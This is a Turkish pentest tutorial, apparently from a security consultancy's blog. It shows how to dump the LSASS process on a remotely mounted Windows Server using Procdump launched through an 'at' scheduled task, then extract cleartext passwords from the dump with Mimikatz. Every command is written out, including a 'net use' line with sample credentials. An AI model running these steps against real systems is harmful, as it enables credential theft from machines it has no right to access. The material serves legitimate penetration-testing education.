Disk Sistemine Erişim Sağlanan Bilgisayardan Alınan LSASS Prosesine Ait Dump Dosyasının Mimikatz Aracına Verilerek Parolaların Açık Halinin Elde Edilmesi

0
559
views
Etki alanı sızma testleri sırasında Windows işletim sistemine yetkili erişim sağlandıktan sonra, gerçekleştirilen adımlardan birisi bellek üzerinden parolaların açık halinin elde edilmesidir. Bu amaçla WCE veya Mimikatz gibi araçlar kullanılabilmektedir. Bu yazıda, uzaktan komut satırı erişimi elde edilemeyen ancak disk sistemine uzaktan erişim sağlanabilen Windows işletim sistemindeki LSASS prosesinin dump hali alınacak ve Mimikatz aracı ile parolanın açık hali elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

WCE ve Mimikatz araçları temel olarak RAM üzerinde bulunan kimlik doğrulama paketlerindeki (authentication packages) kimlik bilgilerini (şifreli parola ve parola özetlerini, kullanıcı adı gibi) okur, parolayı (ve MSV1_0.dll için parola özetini) şifreleyen şifreleme anahtarını elde eder. Sonrasında ise, şifreli kimlik bilgilerini çözer (deşifre eder). Bu yazıda, DCMakinesi adlı 64 bit mimarideki Windows Server 2008 R2 bilgisayarda yerel yönetici hakları ile disk sistemine erişim sağlanabildiği varsayılacaktır. Disk sistemi erişimi sağlandıktan sonra LSASS prosesinin dump dosyası ele geçirilirse, oturumu açık olan veya bir şekilde kimlik doğrulaması gerçekleştiren hesaplara (bu yazı için Administrator, Jale ve Zeynep) ait kimlik bilgileri elde edilebilir. Bu amaçla, öncelikle hedef sistemin diskine Windows Systernals aracı olan Procdump aracı indirilir. Bunun yanında bu aracı çalıştıracak olan bir betik hazırlanarak hedef sistemin diskine kaydedilir.

net use \\192.168.100.200\C$ /user:Ornek\Halit Hh123456

@echo off
C:\ProsesDizini\procdump.exe -accepteula -ma lsass.exe C:\ProsesDizini\LSASS_prosesi.dmp

obtaining-clear-text-password-from-lsass-dump-file-that-is-stolen-from-network-drive-mapping-using-mimikatz-tool-01

Bu betik kullanılarak, Procdump aracı çalıştırılacak ve LSASS prosesinin dump hali elde edilecektir. Hedef sisteme komut satırı erişimi elde edilmiş olsaydı betik çalıştırılabilirdi. Bu yazıda, komut satırı erişimi olmadığı için, “at” aracı kullanılarak hedef sistemde zamanlanmış bir görev oluşturulacak ve betik çalıştırılacaktır. Mevcut durumda saatin 19:40 olduğu görülmektedir. Aşağıdaki ekran görüntüsünde 2 dakika sonrası için bir zamanlanmış görev oluşturulduğu ve zaman geldiğinde (19:42) betiğin çalışarak LSASS_prosesi.dmp dosyasını oluşturduğu görülmektedir.

net time \\192.168.100.200
at \\192.168.100.200 19:42 C:\ProsesDizini\Betik.bat
at \\192.168.100.200
net time \\192.168.100.200
net time \\192.168.100.200
at \\192.168.100.200

obtaining-clear-text-password-from-lsass-dump-file-that-is-stolen-from-network-drive-mapping-using-mimikatz-tool-02

 

Not:at” aracı “schtask” aracı gibi zamanlanmış görev oluşturmak için kullanılır. “schtask” aracı ile oluşturulmul bir görev, görevi oluşturan kullanıcı yetkileri ile çalışır. Bunun yanında “at” aracı ile oluşturulan görev ise, SYSTEM yetkisi ile çalışır ve bu komutu çalıştırmak için yerel yönetici yetkisine sahip olmak gereklidir.

Dump dosyası, aynı mimariye sahip (64 bit mimarideki Windows 7 veya Windows Server 2008 R2) bir bilgisayara taşınıp Mimikatz aracına parametre olarak verilirse, LSASS prosesinde kayıtlı olan kimlik bilgileri elde edilebilmektedir.

mimikatz.exe “sekurlsa::minidump LSASS_prosesi.dmp” “sekurlsa::wdigest” exit

obtaining-clear-text-password-from-lsass-dump-file-that-is-stolen-from-network-drive-mapping-using-mimikatz-tool-03

Komut çıktısının devamında kimlik bilgilerinin olduğu görülmektedir.

obtaining-clear-text-password-from-lsass-dump-file-that-is-stolen-from-network-drive-mapping-using-mimikatz-tool-04

 

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.